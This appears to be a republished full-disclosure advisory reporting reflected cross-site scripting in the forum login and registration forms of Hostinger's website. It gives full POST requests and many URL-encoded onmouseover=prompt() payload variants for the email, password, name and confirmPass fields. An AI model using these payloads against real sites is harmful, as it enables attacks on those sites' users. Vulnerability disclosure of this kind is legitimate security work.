Hostinger Web Hosting Multiple Cross Site Scripting

2018.10.09
Risk: Low
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

Hostinger Web Hosting Multiple Cross Site Scripting Report-Timeline: ================ 2013-06-01: Researcher Notification 2013-06-03: RESPONSE 2013-06-07: Ask About the issues 2013-06-10: Vendor Feedback 2013-06-13: Not Fixed 2013-06-16: Full Disclosure I-VULNERABILITY ------------------------- #Title: Hostinger Web Hosting Multiple Cross Site Scripting #Vendor:http://www.hostinger.es #Author:Juan Carlos Garca (@secnight) #Follow me http://www.highsec.es HTTP://WWW.radio3w.com http://hackingmadrid.blogspot.com http://blogs.0verl0ad.com Twitter:@secnight Facebook:https://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?ref=tn_tnmn II-Introduction: ============= Hostinger® is a free and affordable premium web hosting services provider and domain registrar. Hostinger has grown from a small web hosting provider into a world leading and industry recognized web hosting brand. Hostinger, UAB is proud to be a part of elite ICANN accredited registrars community. Hostinger has successfully localized services in Indonesia, Philippines, Spain, Italy, France, Poland, Romania, Lithuania, Brazil, Argentina, Mexico, Columbia, Russia, Ukraine, and many more countries on their way! ------------------------- III-PROOF OF CONCEPT ============= Affected items /forum/login (5) /forum/register (8) Attack details /forum/login ============= URL encoded POST input email was set to " onmouseover=prompt(952323) bad=" The input is reflected inside a tag element between double quotes. POST /forum/login HTTP/1.1 email=%22%20onmouseover%3dprompt%28952323%29%20bad%3d%22&pass=secnight&remember=1 VARIANTS email 2 ------- email=%22%20onmouseover%3dprompt%28952323%29%20bad%3d%22&pass=secnight&remember=1 email=%22%20onmouseover%3dprompt%28982999%29%20bad%3d%22&pass=secnight pass 3 ------- email=secnight@email.tst&pass=%22%20onmouseover%3dprompt%28952904%29%20bad%3d%22&remember=1 email=secnight@email.tst&pass=%22%20onmouseover%3dprompt%28935474%29%20bad%3d%22 email=secnight%40email.tst&pass=%22%20onmouseover%3dprompt%28993589%29%20bad%3d%22&remember=1 /forum/register. ============= URL encoded POST input confirmPass was set to " onmouseover=prompt(943546) bad=" The input is reflected inside a tag element between double quotes. POST /forum/register HTTP/1.1 confirmPass=%22%20onmouseover%3dprompt%28943546%29%20bad%3d%22&email=secnight@email.tst&name=vbhlwxtb&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_chal VARIANTS ---------- ---------- confirmPass 2 ------------- confirmPass=%22%20onmouseover%3dprompt%28943546%29%20bad%3d%22&email=secnight@email.tst&name=vbhlwxtb&pass=Senight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge confirmPass=%22%20onmouseover%3dprompt%28942726%29%20bad%3d%22&email=secnight%40email.tst&name=noeoyclk&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge email 2 -------- confirmPass=secnight&email=%22%20onmouseover%3dprompt%28982353%29%20bad%3d%22&name=mvjmhkny&pass=Secnightx&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge confirmPass=secnightx&email=%22%20onmouseover%3dprompt%28978014%29%20bad%3d%22&name=noeoyclk&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge Name 2 ------- confirmPass=secnight&email=secnight@email.tst&name=%22%20onmouseover%3dprompt%28981310%29%20bad%3d%22&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge confirmPass=SECNIGHT&email=secnight%40email.tst&name=%22%20onmouseover%3dprompt%28946111%29%20bad%3d%22&pass=Secnight&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge pass 2 ------- confirmPass=secnight&email=secnight@email.tst&name=augbmecb&pass=%22%20onmouseover%3dprompt%28956301%29%20bad%3d%22&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge confirmPass=secnightx&email=secnight%40email.tst&name=noeoyclk&pass=%22%20onmouseover%3dprompt%28972091%29%20bad%3d%22&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge IV. CREDITS ------------------------- This vulnerability has been discovered by Juan Carlos Garcia(@secnight) V. LEGAL NOTICES ------------------------- The Author accepts no responsibility for any damage caused by the use or misuse of this information.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top